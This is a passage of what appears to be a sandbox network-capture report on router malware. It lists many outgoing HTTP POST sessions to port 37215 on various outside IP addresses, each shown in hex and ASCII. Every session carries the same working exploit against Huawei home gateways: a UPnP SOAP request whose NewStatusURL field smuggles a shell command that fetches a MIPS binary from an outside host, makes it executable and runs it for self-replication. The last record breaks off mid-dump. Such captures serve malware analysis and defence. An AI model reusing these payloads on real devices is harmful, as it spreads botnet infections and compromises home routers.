                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1085192.168.2.1335116157.178.137.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503618002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1086192.168.2.133599039.12.22.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503637075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1087192.168.2.1355134197.55.114.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.503664970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1088192.168.2.1336466157.151.137.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504153967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1089192.168.2.1349548150.78.228.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504188061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1090192.168.2.1334278157.218.150.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504213095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1091192.168.2.135305641.87.88.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504245996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1092192.168.2.1343480157.18.219.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504281044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1093192.168.2.134828041.116.63.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504427910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1094192.168.2.1354628146.113.71.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.504596949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 